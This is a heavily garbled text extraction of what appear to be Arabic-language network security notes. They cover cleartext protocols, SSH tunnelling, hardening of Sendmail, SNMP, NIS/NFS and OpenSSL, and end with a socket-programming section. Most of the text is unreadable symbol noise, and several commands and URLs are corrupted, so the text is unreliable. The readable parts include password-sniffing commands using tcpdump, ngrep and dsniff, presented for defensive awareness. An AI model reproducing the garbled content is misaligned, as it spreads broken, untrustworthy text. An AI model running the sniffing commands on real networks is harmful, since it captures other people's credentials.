5
7 L
N
I 5 Crypt 5 ,H
N1"
0
b
? @
0
DY/ (, ! 7
' ,63
?
$, < , 5 ,H ) #.
H, , e G
A" @
I
2 < (, ! $ N
DY/ ) ,<
P! &
<
4
P! &
" %P
H)S
6&
?
P
!
6&
:
2
0
1E
E
6 N4
W 3 K6 2 ) )
) X
62 ) " 0
V
? "
, ?@
%
has expired
O*
3
K6( 4 2 `
•
P $
5 - Y ?@ "
, account 60
P )
5#.
) , ,F P! &
u 7 ) X ) _ ' L 7 L -,< , 1 ] 1
)
B
1
$ 6 )
'
H
, P4
:
2
)?
)
("c) ( E
^P
P
!
N
1 -,< , K
3 - 56) "
P
!
& log in 2 1
)
,
&
/ ? 59 ?@ ?
# 54
"2
I K6
K6account MR/ )
1 P! 0
B'
4) K T
) T G' g
6account &5 0 < +H ) , Y
)
P! &
A" @ ?
6A" @ ?
U)
:
6&
<-
$, 5
, ,F 6account , # 4 0,<
?
b
%L
K ("c
- Y ?@ "
DY/
B
.
SB
g 0
("c 2
) " ?# 7
0
6&
P
!
, account 60 account
P )
$?
, Y 5! ( 5 -, 6,
'
0
MR /
P
!
?@ ?, 3 ?#
?
/
P $S
K (,! 0,<P
F
$
6&
6
B
5F " , -,< - 3•?@
P
!&
U)
% <
F) ? N
Your password
3
F
B
5G1
, <P
= GX
? "
("c
'
P
!
6&
)
P
-,<
6account ? )&' I 5
- 4 $,<
(N "
5 ?@" - Y
3
nB
G account MR /
0
"%
I
'
3
- Y $, - 5
Clear Text Servies
7
L $ U#
$
P
N&
=GX 0, 5
?#
P
!&
6
-,< - Y
5 - Y
?5F
3
6-
I?
telent
) FTP
bP
7 !89 d *
2
2
F
?# $S
? 5F
b
N
)( d *
0 , <, 6 3
Clear 7
2
_
L
7 !89
text plain
" )-
,
b
!89
SL
<] -,<
U#
< ?#
b
' ,B )-
6
"
R4 S @
)@ +5F
a,6
3
6N
6-
#P
< 6U )
?
,
) ))7
L $ -, 6 U )
-,< -
.
_login 7 !89 ]
$ F
<d *
0, 5
!89
I 5 8Q 0 )@ , 6 3
, 6 3 plain- text 7
!89
" ,G
) -,< E ^ P 7
6v 4 ) ? ,
6'
,5! ) - Y
$
sniffer
-, < K
2,
SB
g 0
N&
h / 7 !89
) #P
<
6U )
"
) 6 ' _ #P< ' -,6 ]
bP
B
.
#P
< 6U )
"
_
)
N6 ]
3 785/
)
6
P! &
3
1 " T),F
$, 5
1P $ Text
U)
Clear
7 4
Clear Auth
1
@
Content
FTP
21,20
Yes
Yes
$2
TFTP
69
Yes
N/A
$2
telnet
23
Yes
Yes
2
SMTP
25
Yes
N/A
$2
Pop3
110
Yes
Yes
$2
rlogin
513
Yes
Yes
2
HTTP
80
Yes
Yes
$2
?
6, K
, 6 3 TP,
?
^
2 c
h /
F$2
6-
FTP ) Telnet
I K6U )
T
L
7 !89 $ , <
" ,E - Y
2 7
,
6U )
< TP,
b
$
P
!&
clear text 7
,
0, 5 Z F $ , K
F$ ) - "
2
‚ / T3
- Y ? 5F
Clear text
I
?5F
-)8! , 5
? @" - Y
0,<
7 !89 % <
&1?),
%
a I YB* 7 , ,
7 !89 d *
)$
< $ ,L
-, < K
6*
5
Free/OpenBSD j
0, 5
SL
6U )
) 2 3@
^
l ' 6U )
"2
$:
"
3
+,
6
ZQ
6U ) ] l ' R4 S @ : d *
? 5F
b
_sniffer] -, < - Y
6&
5
5
]U
1) U#
$ e 'j 4 7 L $ _,<
+
clear
7
5 ) FTP )telnet ]
T) ,
2
I
",
)
" $-, < K U#
5 0_, <P
)(
3 - *1 7
$785/ ( E
- Y text Clear
<
L 7
$() *
0, 5
0
I 5 A) 2
&'(
! ". /0(123&
2t5: ) 2
[
# $ _text
? 5 T G'- . 0 5 - Y tcpdump $
"2
" 7 L clear text ^ P
a
F
2 1
), 0
6d *
I 5 $l '
#tcpdump-X-s1600
5 - Y & ngrep a
assword
6 ' #P<
-,
'
- .0
I
I N
) sername
6
I W 3 K N1
$ 15 / • & M) /
5 - Y
" ?
"
2
E F ?# $ l '
I 5 $ M) / 21
)] , 5
http://www.packetfactoty.net/projects/ngrep/
0_
"7 L l'
? 5 TG'
#ngrep assword
h
/
0
6-
d *
"2
I5
& 2 1
),
6% # ) 4 )
N \
h @" ?
l
'
? 5 TG'- . 0 5 - Y
:
2
$ Dsniff 0 5 - Y _ P
!& )( ]?
P! & ) ( z)"
? @ $ d . " U4 ) ( E
6& " ?
5 W L3
("c
POP3 ) Telnet )FTP
? )@
$l'
I $ E/ Plain text
,
0
, 63j
5
http://www.monkey.org/~dugsong/dsniff/
a
"7 L $l'
#/usr/sbin/dsniff
! " %&
level•Link
,
,<
N& %H ,/ ) End- To- End
N, # T G
•$ 7 # )
connection
6
N&
BH
m .1" 6%# ) 4 3
N& " - Y
+H ) , Y
?
$,<
5
_tunneling]
h
SSH
% H]
) Z F U#
)(replaces
6*
R 4 M :G ) T) ,
Q
l'
-, < "
- 4
5
I]
N&
( E SSl
OpenSSh
_ http://www.openssh.org/ h @
telnet,rloging,rsh) ) - " 7 9P
0
"2
_ HTTPS , POP3S
K6% # ) 4
) $ SSH:Secure Shell n 9 "
0
456 123&
- Y X11 )(pop3,SMTP
I
?@ " ?
I K6%# ) 4]tunneling
)
0, 6
2<
?
)
connection )
?@ ,
POP3 ? 5 tunnel - .
Z F & SSH
0
"
P POP3 -, 6 U )
a K5
F -,
U)
#ssh-L110:pop3.mail.server.com:[email protected]
- < localhost
7
4$ 6
7
4POP3.MAIL.server.com 7
7 L
# ) #1
# ) #1
4 -, 6 U )
4 -,
U)
$
] TCP110
T 5G T) M83
) 2 < 2 7 9P
5 S
110
2, _
0 (tunneled over SSH) 0,< ,6 3 ( E -,< &
stunnel " - Y tunneling
P
) _ openSSL Toolkit " - Y
0
] "
, * plain text 7) Y
'
N&
T) ,
- 4
6% / - "
N
#
SSL %# ) 4 $ l 'A) 0
6%# ) 4 ? 5 tunnel
0 5 - Y http://www.stunnel.org h @ " ?
I5
?@ ?
l'
'
Senmail
6
? 5
) ') ' $ T
# Sendmail 0
"
? G ?@ "
- Y $
785/ ?
(,!
:
# ) #1
)-
)?
?
- Y U
-
1)
4? ,6U)
- 5
? 5F
5 ,H % 1
, -,< ( E 785/ Q
:
2
-
6
SB
g
#
#1
Mail Transfer Agent 2 1
),
-
3 ?1
$ Sendmail
I 5 ?@ "
- 56
'
# ) #1 6
1
) M ,6"
-
-,6
$-,< SL
a 5 - <
?@
+" U „@
# Sendmail 0
^P
6*
,G
S
3 785/ "
patch
5 2,
CERT ADVISORY CA-2003-12-BUFFEROVERFLOW IN SENDMAIL
-CERT ADVISORY CA-2003-07-REMOTE BUFFER
-
CERT
ADVISORY
CA-2003-25
BUFFER
OVERFLOW
IN
SENDMIL
a 5
-,5! -)
)
?
SENDMAIL
bP 7 , , ) 7 :3
,
, 6 3 BUFFER OVERFLOW ?@
#4)
% , PC
8Q], <
T) \ 7 , , ")
< TP
B
!
7"
PATCHING (, !
) e 'j 4 ,
#4
"
Y 7 GP ,
B % ! 0_ # ) #1 6
S
2'
+"
) 5 ,H
- 1
@ &
6*
6% '" - Y
" - Y
() \ 7 , ,
C,5!
B
B
!
0
$() *
send mail " -, < S L *
0,<
- 5 U#
)U
+,
1 6*
TG'e 'j 4 7 L $l 'U )
+
*
K
)f ,
5 ,H *
-
) '
' j6 ?@
? 5 d*
I
0, 5 - Y
R4 S @ ^
X !
Send mail
<R
HS @e G
"
0
! ". /0(123&
6patch )
R 4 S @ ?& $ 9
< ,6 3
5 CP
l ' &'(
sendmail
" ,
, ,F
-,
patch
*
- 5<
Echo\$z\usr /lib/sendmail- bt-d0
7Y ,
$
,
#4
F
sendmail -, <
" ?
sendmail -,< d *
l'
K
*
2
3@ "
6
@
, <
http://www.sendmail.org/current-releaese.html h @
! " %&
4 sendmail DY/ ) "
a
$
F
6patch 2 3@ " ) Z
*
http://www.sendmail.org h @ " ?
]
% !
? ,
X !
9
25
2 3@
source code
patch
I
F
- 5 sendmail *
-, < K % !
456 123&
•
*
'
0
#
'
" %/
- Y
5 - Y
?
$_package
0 5 GF
U
1 6
?@
Q
1G') - P I
e
'j 4 7
•
L C 5! sendmail
mail -, 6 U )
? !
# @
/] U#
)
daemon
)
6
_
,6 * mail
SL
? # _ –bd ˆK ? 5 T G' g]0, K5
T
#4
:
sendmail
sendmail
1/
2
< ,6 3
etc/mail/sendmail.cf h @
F l ' 62 <
F) ? `56l ' 6
# 4 % ' mail reliy
,
b
<( E
c 5G )
C
^P
# ) #1
P
5
,
0
- <
sendmail.cf $ ,
< (
#4% '
0
.
"
"
Z F deamon 1/
$
!89 +
" ?
:
2
sendmail
0
%
H
•
("c #
/ ? 596, < ( E
, #4
a 5 - Y
http://www/sendmail.org/tips/relaying.html
http://www/sendmail.org/m4/anti_spam.html
T G' g e
3j 4 ,
'j 4 7
#4
L open relay ? # sendmail 8.9.0 *
?@ C, E $ % !
6
? ,
- 5 -, < K sendmail *
$% !
-, 6 U )
- Y
(, !]
( E
X !"
" - Y 7
W
" ,G0,<
0, 5
L3 2
("c
TG'
H
_realying]0
("c$_ N
-,
? 5 ˆ K ] sendmail , ,F *
*
, $ 5 ,H *
b
-, < K
$ sendmail ,
h @" ?
,
#4
#4
" - Y ? "
6% ' u W L3
^P
7 K
&F "
("c
6@
•
,
0
0 5 - Y http://www/sendmail.org/m4/readme.html
download
)
- Y pgp signature "
9
"
" g@
6*
integrity
<R
Q
# *
?),
ca-2002-28 h @ " ?
?
" E " ? 59
< H
0 <- Y
3O *
" sendmail
F +
?@ "
/S
? "
:
2
•
#
I
# 2
$
("c :
5 sendmail
0 5
source code
sendmail
B5# 7 !89
2
'
6trojan
I5 0 , 5
, - 5 sigm
I
6, B0 5 - Y CERT advisory
-, < - Y
http://www.sendmail.org/ftp/pgpkevs/ h @ " ?
I 5 MD5Checksum "
a 5 - Y
sendmail
'
PGP ?, '7
)@
,
0
- Y sendmail +P , INTEEGRITV
"
!89 +
" ?
7 !89 S
http://www.sendmail.org/secure-install.html
http://www.sendmail.org/m4/security_notes.html
gshapiro/secu rity.pdf http://www.sendmail.org /~
Simple network management protocol
(SNMP)
6- N
5
SNMP" - Y
, # 4) ) - " y
#
I 5 ?@ "
0 <
SB
g
- Y
$T
-
1
)$
6Access Point$ 6ˆ K $ 6 ) $ N4
" $SNMP0 <
#P
<
- Y $ #P
<y
) SNMP
6N
,
6N
TCP/IP
G
- Y
SNMP %# ) 4 "
I
#P< 7) Y
P ' 4
6( '784 2
I K 6N
, ) ,
6N
6-
"
2 ( 4 1P
I5
' )
)Y
0, 5
"
PG ), K (& # ) -,< 1P
,G
* ]SNMP
,
-, < - Y
6N
I 5 -,< - Y
B %
6A)
6A)
! B
5F " $ 6 ( 4
bP
R4 S @ ^
b
6( 4
3
-, < K
(E
H$l ' R 4 S @ ^
, ) ,
I 5 -, < - Y
" - Y
# 4 _U )
6 A) " [
? 5F 0
? '
9
SNMP
A) " [
, G 7c L. ) - P ),. SNMP" W 3
,1 b
), K
:
6A)
- Y
R4 S @ ^ 0 5 -,6 $03-2002-CERT…h @‘ ?
R4 S @ ^ 0
3
3
SNMP R4 S @ ^
0, <
7 K
&F - 5 _
6( 4
#4
% <&
*
$l '
? ,
" ] DOS \ " 7) Y 785/
SNMP
P 7 & E ) 7c@ 2<
-, < - Y
o
SNMP 5 , H
]
&
? G -,< &
$
SNMP 5 , H
6A) " [
N& S
6*
g’ V
6(
P e
%
! N "$
-, Y SNMP
5 i: j &' I 5 ? , , 1 "
< $h /
6-
^
$ SNMP
' )
!89
< TP,
I5
_?@
-, < % L
3 M, 6nH ) S
*
e
'j 4 7
T, " - Y
-, < K
P
6A) W L3
#P< 7 & E
" %
/f
%1
,
:
$"), )
F
2
- Y )
("c ,
G ) G
I 5P ^
u“
L 3 “7 L
3
) 7 !89 Z '
25F 0,<
,G ) TG' SNMP
5 SNMP
- 5< *
$SNMP
#4?
) ,<
- 5< *
d * SNMP0_, *
5 U#
785/ Q
$SNMP
-, < d *
U#
?@ - 5 ) SL SNMP *
U
T G'e 'j 4 7
SNMP , # 4
6
1) U#
% !
6
L $l '% # ) 4
SNMP
l ' R4 S @ :
$
P 785/ &1 @
,, e G
)-
6
- Y $ Bridges ) 6point access$ 6 N4
0
0
Q 0, <
^P
3 785/ &
c L. $ N
]0, <
“V
X !
] #P<
Q 0, <
K
6T, " - Y
,K
" ,G b
H$l '7 !89 " - Y
, 1
, 5
B!,
j & '
) 6
F
j , 4
R4 S @ ^
<0_, 5
O*
6( 4 , K
"
5 i:
L ? ,
H
6N
3 ]
6N
6 * 0_78#
- Y
R4S @^
PG
PG ) , K I 5
" $SNMP) )
<’
'j 4 A N0, <
6( 4 "
4 "
6A) " - Y (,!0, 5
<“
,
6*
P
5
SB
g
0,
#P
<% !
6
0 < ,6 3
=GX
6
)
X !
) 6N
H,, e G
R4 S @ d *
?
2
$ #P<
-,< %L
)
F
5 $ SNScan N 4
6N
0 5 - Y
)
SNMPSL
A)
P
) #5
- .
I5
"
h @n
0
9"
5
("c
7,
-
?
$
?
,
2
E F$?
F) N 4
0
I 5 ("c 7 B
5!$SNMP "
1 ("c
"
http://www.foundstone.com/knowledge/free_tools.html
'
W L3
@?
6 & " - Y ?#
(E
:
2
SNMPZ&F ) SL
7 L
- 4- ."
0
6 @ " U4
GF
9
SNMP?
(E
#
% !
T G'd *
2'
5
'
2
F)0
(E
w•w)w•p 67 4 )
("c 7 K&F "
6 @
I5 0
b <"
6"
F T/ “SNMP“
R4S
B1$ SNMP
@
0 5 - Y CERT-2002 03h @" ?
# n. 7
a < ,6 3
? G -, < - Y
] 13
W L3
$SNMPSL ) "
H,, )S @e G
F)•
'j 4SNMP Community
)e
_ P
!
")
F)•
community SNMP Y*
F)•
6 <
DY/ - .
$ l ' R4 S @ : %
DY/ I 5
0 5
a-,
,, )?
P@
?@ " - Y 7 ) X (,! 7
N& ) 6( 4 , K
I 5 $ SNMPv3
6
3
6, "
%
DY/
SNMP ? 5 TG' g•
P
T,
" - Y •
_? # 7
-, < K patch *
j*
?
$? ,
2 3@
$)
, 1 7 L*
6&
h,/ % H SNMP coomunity
R4 S @ : %
D Y/ 7 , H ?
4
*
"
6 @
] 6-
SNMP " - Y 7
S L $-,
•
,1 b
0 5 GF $ CERT Advisory CA-2002-03 5 5X
)TCP/UDP
,
^
w•w7
4], K5
SNMP agent
K6
9
),.
!89
SNMP
3
b
3
,
? &
w•p7
4
6N
"•
T
2#5 l ' J)0
("c T
$U#
B'T)
' " - Y 0
,
^
P
A R 4 W L3
? 5 V8
SNMP•
B
F) F 3 7 L
lYB
5! ?
y
6
6-
SNMP agentb
6
6
3
$
)
6
) TCP-Wrapper
P
(E
6
% !
agentb
) )
l '7 B
5!0_TCP/UDP
) X #
0
- Y
B' #P
<
?
6
1
)$,<
Q
0
(E
( E xined ,
& ?&
#4
agent
)
0 < +H ) [
h,/ % H
DY/
SNMP? 5 TG' g•
?@ " - Y 7 ) X (,! 7
I 5 $SNMPv3
N& ) 6( 4 , K
6 < %
P
" - Y •
T,
_? # 7
I5 W 3
"
$)
("c
2
0
- Y _
- ),.
)
) 7 L )-
)
( #.
6& ? G -, < - Y ] community
P!
h,/ % H g
& )
0
@ 3" ?
,
O*
u&
("c
:
2
0
(E
N
"W 3
6
F 7 # " - Y
•
P
!
6&
-, < '
- Y $http://www.sans.org/resources/idfaq/sanmp.phph @
) TCP/UDP
,
C
'
W L3
•
SNMP " - Y 7
*
0, < I
] 6-
^
w•w7
4], K5
B' ,
) )
6-
l '7 B
5!0_TCP/UDP
) X #
y
B' #P
<
# 40
(E
0, 6 ( E $-,< &5
$
,
-,< K
SNMP•
B
^
w•p7
F) F 3 7 L
6subnet 2 SNMP " E
'
4
6N
I5
SSH
(Secure shell)
% 'T
F$Login "
)7
l ' * ] OpenSSH
&'(
25
" U#
P
- Y $SSH Communication Security
R-
) telnet$ Ftp
6
,G
P
6=GX$ -,< - < *
&K/$ ? @ "
,
,G ) -
,, 2 5 0
b
_
U)
$l ' R 4 S @ :
_U
:
F
6=GX Q 0
F)
)-
56
?# $SSH
" - Y
N5
6=GX
,<
F
-,< K 7 !89 Q $"), )
] nix*) "), )
1
$U#
0, 5
Command
P B '8
i: ]
#P
<
SSH #
? `56 1
)$,<
K
&F 7c #< C
'
)? ,
(, !$
6
Q0
)_open-source 7 L
5
( ,H ? @ ? 5 M 9
R 4 S @ 2<
? ,6U)
)
6
E *
P
$SSH
5! U )
bP
0
?5F
SSH
6b.
SSH-, < "
- 4
6*
SSHS
%K ,
( N ) 6Patch
$("c "
# ) , #4
0,<
,
^P
< TP,
C L3
3 W 3 78#
)
SSH2
K 6% # ) 4
&
) HTTP$U )
$telnet
-, < -
-, 6 U )
…-,
^ P
C
$_ SSH2 SFTP
U)
L3
A"
R4S
4
Kc
F) ?@ ? #
2
#
"
@%
W
SSH2) SSH1
], < ? # -, 6 U )
) -,
4 (,!
3d *
6 *
R4 S @
, 5
6 &'(
F
" , G
$OpenSSHb
&
<
- <
# 2
6&
) clear text 7 L
-,
L3 2
U)
P
I
$ SSH1 % # ) 40
H
session
&
SSH2
#
)
0_
OpenSSH
"
2&N F , 5 ,H]POP3
? , % 1 2 , 0, <
],
N, #
@^
6A) a I ]rhost
6sessionS
% # ) 4 " - Y $ #P< )
:
R 4S
;! _rlogin) rcp rsh$, K
7 !89 T
)- P
d *
("c0_
SSH *
("c
F) & Z Q
OpenSSH ?
-,< E
6%
4%
CERT
2002-23h @ " ?
$ 9
l ' * ] OpenSSH " - 1
@ *
I 5 0,
7 K
&F "
6 @
pqqp T
0 5 - Y Advisory
) ' 6S @ ;! ) A
%
3
6
? "
R 4 S @ (, ! " ? 59 ) :
I 5 0, <
trojan-horse
_
2
7 !89 S
- Y http://www.openssh.org/txt/trojan.advh @ " ?
$l '- 1
@ *
0 5
,, e G
-,< K
* ]?@ " ,G OpenSSH 3.3 ?@ )
U
) SSH Communication Securitys SSH 3.0.0
% !
6
1 U#
*
6
)_version 3.6.1$pqqp T
Z F ) S L _version 3.5.2- 5 < pqqs T
-, < K
0 < ,6 3
* ] ?@ " , G
HS @2 e G
$
R4 S @ d *
*
R4 S @ W L3
-,< SL
U)
*
("c
- 5< " $“ ssh-v“
) - " d *
6*
$S
N 4
?
:
2
& $ ScanSSH0,
Patching (,! % 1
,
0,<
- 5< ^ P
ScanSSH *
" - Y
0
#P
< 6h @
2 3@0, 5
K
4
6Z
0 5 SL
?@
http://www.monkey.org/~provos/scanssh/h @ " ?
'
a
Patch2 3@
)
R4 S @SSH? , 6
! " %&
0,
(E
- @
< &) j 4 ? , 6 U )
-, < K pqqw T
0 5
F
I5 , Y
1
$ ScanSSH :3
"
?
- .
F
"
*
$l ' R4 S @ : %
2
3@
?@ )
0, < 2t5: ?@ *
'
DY/ I 5
)SSH *
- 5 OpenSSH )SSH #
$,< -,< SL $% !
)
openSSH
456 123&
% !
-, 6 K
"
9
2 3@ SL " $OpenSSH" - Y 7
•
SSH1 G
:
0,
0,<
? ,
-
*
P
,
TL ) I
-
*
6 & "
6
-, 6 U )
S!
5 $" E ?
!
j &'
0
6A) $?@
I5 ? @ " ?
, # 4•
U)
S
2
0, 5
U)
N 4
)•
W L*
,K
, #4
SSH? ,
2#5 -,
"
I 5 0,6 d *
,Y :
5
5/
rsh
2
NO , $SSH , # 4 % ' FallBackToRsh, B
P
-)8! S
,6 3
- 4 *
)? @" - Y
6 ) ?
- Y O B
:
2#5 $DES3A) ]
L
F
TL ? "
2`
7
3 5L -, @
), . ? # 0, 6 ( E
0
0
F)
$SSH-,< "
6
2<
" - Y )
) <,
! 5E
F
6 & "
SSH
SSH2 G
I
# 4,
G ), 51 /•
SSH2 SSH1 * $
Z
- Y DES3%
2, 0_,< -,< '
3
P
( #.
N& " •
blowfish
I
9
*
" & -,< ( E
e 'j 4
N& $ 7 B
5!
+ ,I
!
+
; Q
NIS/NFS
) $(Nis)Network information Service)(nfs)Network File System
U)
Sun
) $ NFS0, <
<b
#P<
F
) V < ? # l 'U )
6 '• &
6
6
2
" - Y
7) Y
6
% ' I
,
6% ' Q
)
u T 5! ? # $NIS & 5
maps]
7
u T5! 7 ) X (,!]0, 5
?#
^
6% 'V
0
-,
) L*< 6
$ nis0
7
U#
6 #P
<
I 5 Microsystems
<
"
-
)
4 ) / 9$U#
F
2 % 'V <
,
6% '
A) $ NFS0
,
-,< +"
, 0, 5
-,< - Y
!89
U)
6 'hosts)passwd
6 '_ !89
] :
7 !89 K $NISM,62 5 0_ #P
<
"
F
6
I
6
5 group)passwd
?
,K
& 5
=GX C
8Q]
NFS I #P< 6U )
B'0
I5 ? @ "
,G
? @" ,
?5F
3 ?1
,, e G
6
"
H
NISb
I K6 &'(
" - Y
I 5 NIS
"
(& # 0
? 5F
,K
) 6, "
0,<
dos$buffer
S
', 6? G
F
6- Y/ " - Y Z
-, < - Y
- Y
patching)NIS)NFS 6U )
$S
F
6
0
_?
F
3 785/
, 63
) -
!89
)-
B
. 7
3W 3
F -
?5F
S
6=GX
)
?
H ypcat
j 5
P! &
$() *
- 5 U
0, <
1) U#
NFS )NIS
"
+,
6
5 CP
TG'e 'j 4 7 L $ l ' 6U )
+
6U )
:
,F
) ) -
0, <
K NIS)NFS " *
-,
"2
(E
R4 S @
0, - 5 - Y
6U )
)-
\ " -, < ( E 785/ Q 0, -,
# 4 (, ! 7
% '
$NFS)NIC
56? 5F $ l ' 6U )
, K
6maps]
_ I
6=GX
, G 785/$ ? @ " - Y
overflows
-
_ <
0,
! ". /0(123&
R4 S @ d *
I5
a
K6 *
5 0-,
), , e G
,1 b
,< -,
-,< K
SL ? @ )
F patch 2 3@
" - Y
NIS *
I 5 0 ' 6 @ -,< SL NFS *
j 5 &
NFS *
6@
- 5< l '
•
patch 2 3@ SL " ? 59 )
rpc.mountd-version
- 5 <"
4
6*
Q
) -,
(N
0 < ,6 3
HS @
- 5< " ?
] 5 - Y ypserv-version
" ?
0_
,6 3
(N
R4 S @ ^
0
R4 7
N
4
" ?
$ &'(
, ,F 6=GX W L3 , "c
a
4
NIS map
?
2
0 F
P!
a
4
NFS S
6" E ) netgroups$?
% '
& ?
7 L -,<
3
I5
, N (,! " ? 59 •
6&
" •
I 5 cracker
"
-,< = G
6& ( #.
"
5
, # 4 (,!
password root
6
0 5 - Y $-,< = G
- Y
NISS
"
I5 •
R4 S @ d *
P
!
, # 4 (,!
( N W
L3
3
I5
("c
•
etc\exports\.
) -, < export
"
! -,6
I 5 showmount e
F•
0
?@
6
R4 S @ : %
4$NIS , # 4
a
" ("c
N 4]? ,
U)
NIS? , 6 U )
)
0_NIS -, 6 U )
-, 6 U )
67
S
2, 0
4 n 9 " ) -,
- Y makedbm
^P
"
? 5 d* •
i
? G 6
TG'Yp-secure
U)
DY/ - .
6I W L3
J)$ DBM 6% ' E ? "
b
1
- 5 S ˆK " ?
6
:
2
3
0
•
C
'
,6 3 v 4$" E
0 5
-"
/var/yp/securenets
4b
6 #P< )
U)
a
%
)
?
+:*:0:0:::z •
password map
4 NFS , # 4
^P
-
-" F etc/exports % ' ? ,
U)
"
6h @ " - Y •
qualified domain names]fully_FQDN ) IP ,!
0_ <
& z •
- Y ypxfrd) ypserv 6
0
NFS ? ,
5!
#
"] G
- Y $ NFSBug (
0, 5
" ?
K
,
,
#4
I5
!
I5 •
#4
7 # l '
0 5
$NFSBug
" ?
'
0 5 - Y ftp://coast.cs.purdue.edu/pub/tools/unix/nfsbugh @
% '
:
I 5 etc\exports % '" - Y •
),. T5!
a "
25
? )&' NFS % '
4
U)
mounting "
15G ?
domain (
^
4 ? )&' NFS
6
G5 …
) IP h @ " U
4
home10.20.1.25(secure)a8Q0NFS -,
? )&' ?
^
l '7 B
5!0 S
IP " U4_2< ) ?, 3
0
NFS % '
6" E
rw
)
? 5 export …
ro]("c
, 3 b'
( E etc\export % ' NFS -,
U)
6" E
domain (
./ro)10.20.1.25 homeC
8Q
^
Domain ( ) IPh @ " , G root_squash
superuser $, < -,< TG'l '
NFS -, 6 U )
)
4 #
H$ -,
U)
- Y NFS? ,
0
ID nobody
4 "$ ?# 7
NFS -,
U)
user root S
)
0
…
U)
ID root
)
2, 0
2&N F
, 6 * root )
6% ' u
root_squash/.)10.20.1.25 homeaC
8Q
?
l '7 B
5!0
0
TG'7 4 y
4
% !
4 NIS ) NFS
5 ?,< V8 " ? 59
^P
I 5 T) ' 6
•
n 9" C
”
'
"
)
(_Rpc.nfsd] pq‹{ 7 4 )_portmap]www7 4 C
8Q]
U)
)
( E ./etc/system % ' 1 line set nfssrv:nfs_portmon ? )&'
a
67
$U c
$ NIS)NFS ? , 6 U )
N" •
) X
?#
0 <( E " E ? ,
g
0SSH• I 25 % # ) 4
2
NFS" - Y W L3
)
•
("c
0 5 - Y http://www.math.ualberta.ca/imaging/snfsh @ " ?
NIS ? , 6 U )
,
# 4 ) SL
Z
)? ,
^
,1 b
-,< K
6 @
0 F
7 !89 "
checklist UNIX h @ " ?
$=! >
5 SL •
6patch
*
%K
:
$ NIS)
2 3@
? 5 m .1 U#
0 5 - Y security
d *
K6
W L*
deamons
)
("c
N 4
0 5 MR/
, K ) / 9 NIS )NFS -, 6 U )
I 5 0, -,
) "
NIS ) NFS? 5 TG' g•
^
6 )]NFS ) NIS
_?@ )
6U )
?
Layer open secure sockets
(SSl)
? )&'
H
I5 f
^ P
N, #
l 'f #4 " -,
(E
N ,G
#P< n 9 "
- Y
6
open source 7 L ]openSSl
&'( $_
2
K6
-, < 1P 7 !89
j &'
?
^P
, 5
4@ -, 6 U )
SB
g
? 5F 0, 5
"
openldap,cups,maila
I
OpenSSl0 < , 6 3
a 5 - <? @
H$ l ' R 4 S @ ^
N
H F
5
" - Y
0, <
2
,G
e G
5
openSSl
- Y openSSL
,G
$(
*
# 0,
- Y
-
?5F 0(
openSSL
5
& , 5
?
$ openSSL
M, 6"
0,
6
- Y openSSL
6
25F
6
#P
<
I
3 785/
$ :
u 3
3
K
O*
"
H
a, 5
5/ I 5 ],<
openssl " - Y $ 7
I
N&
H M, 6%
- Y openSSl "
4@ -, 6 U )
^ P $hhtps "
0, -
" connectionn
N&
3 <) 2 5 $
0_‹‹s 7 4 )
*
R4 S @ ^
$()
$T)
? G - *1 ,
,, e G
% !
6
F
) openSSL 0.9.7 *
?@ )
U
0 < ,6 3
1 ) U#
HS @2 e G
6
"
$
6
F ?@ " %P
H
R4 S @ d *
,, e G
$,< -,< SL ?@ " % H
I 5 $ openSSl version
" ?
) versipon 0.9.7a *
:
2
0 5 - Y $-,< SL
#
0 < ,6 3
&'(
*
H S @)
- 5< "
R4 SP @ : %
a
4
"
- 5 OpenSSL #
9
*
2 3@
9
% !
%L
0
I5
"2
F
6 &
openSSl -, 6 U )
)
•
?@ ) '
•
) ipfilter" $? # 7
K6
<- Y
Z
, 1 " $,< -,< SL % !
0 5 SL
T 5!
DY/ I 5
2 , ,F ) 2 3@
-,
6@
DY/ - .
$l ' R4 S @ : %
$ openSSL *
- .
:
), .
$,
Q2
gN8 3(
2& &
Socket Programming
K
&F ? G ) ( E % !
Unix % Q
6% !
?
,
u
0 <
F) M :G 2
@
TCP/IP – B
#) 4 "
6‰ 9 b
bP
S L ) K ?@ - 56% !
h
?@
IP)TCP
B
#) 4
SB
F Linux % !
- 4C
c 5G
2
?,
Windows
%
6
"
6N
"@
H8! I R1
6b .
%B
.)
0
N C %Q
@
, 6,
b.
u
,6 * U
) -
?)
-, < = D U
/ 9
<
b.
#
= G
c
•
A 3
)
) W 3 # ) #1
C5
6
2
‰9
6Y
.
, U
BT
6
K6, $n5! ,
GCC F
2< ? "
c
.
K %L'2
,
• ( Y ) #P<
TCP/IP% # ) 4
i
.
e ' , 5 %
<@ #P
< .
H
7
-J) 7 #
G(
0,<
e 'T/
% '
,
2< A) -
0, 5
%L'2
0
b.
4 b.
1Q ) 6
K 2 `56)
) Linux % !
5
63
6C? "
,
, <
0, -,< 5F
,63
PE
.
( Y2
.
(
6
^P
'#< ,P
1
" g@ : %L'2
0,
#P
< .
Y(
H
?@ ( Y ,
(5
I
%L'2
c
,<
6
P"
U#
(5
% !
) ,< \, 6 ) 4 2 -
/
y
?/ 9 b
? F T P) #P
<
0
% '
7
b
B'"
) N4
,
&
(I/O)
6 F) 3 )
,
5 6Y
", -
6U#
5 <, < $,
3 @
T,
• , < -, <
) )\
,
)%
% '
b.
B
5F 2 5< , <
! ( 5 •0 < T, )
7
@
L
N4
#
B
% !
N N)
(E
"
,
T /2 !
)-
7 B
5!
3
,
$2
k
a, 6,
(Read Only)
< b' B'7 L ?@
,
(
_ fopen()
- <? !
% ' L*
% ' , 56
N4
open() 7
% !
&@
_=1
] 0,
' %P
H B
/
"
E
_O
0,
2<
15G 7
0,
?56
, <T
N4
$_ fwrite
%PH B
/ " -,< " % '?)
_ fclose()
? ! ˆ6
0
)
)
("c 2
-, !
2<
close() 7
U
0 ,< ,6 *
B
/ ,
j 5 .Y % '( ,
H
4"
] 0, , P % '
( 5 " U4_
256 < ( E ,
B
15! ) N4
* ? G N4
", -
#
H- Y
0 , 5 T, % '? !
# ), ,
F) 3 )
=B*
a, R
"
6N
B
/
?@ " ?,
3
j 5 .Y
6N
#
U
B
5! ( 5
,6 3 M Y< ) -
)? #
@0
(5
H U#
< b'
B' N4
, 3 b'
, 3
B'T
< )
< )
, 3
< )
7
, 3,
F
,B
B'-
B'U#
I/O \
L % !
a
6
5< $
, 3
B' *
, 3 b'
(con)
I
) )
6- & ,
< )
3
= D) 2
0 < '
2
_z
]% '
C H ,< 'G N4
b '$
6-
write() 15G
k ) ", -
% !
,
)
% '
'
b.
6
' R4
?
…
B' N 4 …
